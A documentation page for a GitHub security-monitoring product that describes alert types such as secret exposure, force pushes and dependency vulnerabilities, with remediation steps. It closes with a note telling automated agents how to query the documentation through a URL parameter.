# Alert Types & Response Learn about the different types of GitHub security alerts and how to respond to them effectively. ## Alert Types ### Critical Alerts **Secret Exposure**: API keys, tokens, or credentials committed to repository. * **Action**: Immediately rotate all exposed credentials * **Prevention**: Use secret scanning pre-commit hooks **Author Mismatch on Protected Branch**: Commit from unrecognized author on main/production branch. * **Action**: Investigate immediately, may indicate account compromise * **Prevention**: Enforce commit signing (GPG/SSH) **Force Push to Protected Branch**: Git history rewritten on critical branch. * **Action**: Review what was deleted, restore if necessary * **Prevention**: Enable force push restrictions ### High Priority Alerts **Critical Dependency Vulnerability**: Dependabot reports critical severity vulnerability. * **Action**: Update dependency within 48 hours * **Prevention**: Enable automated dependency updates **New Admin Access**: User granted admin permissions to repository. * **Action**: Verify authorization, review access audit log * **Prevention**: Limit admin access, use least privilege principle **Suspicious Commit Pattern**: Multiple unusual indicators (timing, location, size). * **Action**: Review commit contents, contact author * **Prevention**: Require commit signing, enable 2FA ### Medium Priority Alerts **High/Medium Severity Dependencies**: Dependabot alerts for non-critical vulnerabilities. * **Action**: Schedule update in next sprint * **Prevention**: Regular dependency update cycles **Missing Branch Protection**: Critical repository lacks branch protection rules. * **Action**: Configure branch protection * **Prevention**: Repository template with security defaults **Unusual Collaborator Addition**: New outside collaborator added. * **Action**: Verify need for access, review permissions * **Prevention**: Regular access reviews ## Taking Action ### Investigating Commits When suspicious commit detected: 1. Review the commit diff in GitHub 2. Check commit author's recent activity 3. Verify with the supposed author (via separate channel) 4. Scan commit for malicious code patterns 5. If malicious, revert and rotate credentials ### Responding to Secret Exposure 1. **Immediate**: Revoke/rotate the exposed credential 2. **Investigation**: Check access logs for unauthorized use 3. **Remediation**: Remove secret from git history (`git filter-branch` or BFG) 4. **Prevention**: Add secret to git-secrets or similar pre-commit tool 5. **Documentation**: Log incident for security review ### Dependency Vulnerability Management 1. **Assess Impact**: Determine if vulnerable code path is used 2. **Check Patches**: Review available updates and breaking changes 3. **Test Locally**: Update and test in development environment 4. **Deploy**: Roll out update following normal change management 5. **Verify**: Confirm Dependabot alert resolved {% hint style="warning" %} **Important**: Always verify alerts through a separate communication channel. Attackers may use compromised accounts to dismiss or hide alerts. {% endhint %} --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://docs.sentry.auditware.io/monitoring/github-activity/alert-types-and-response.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.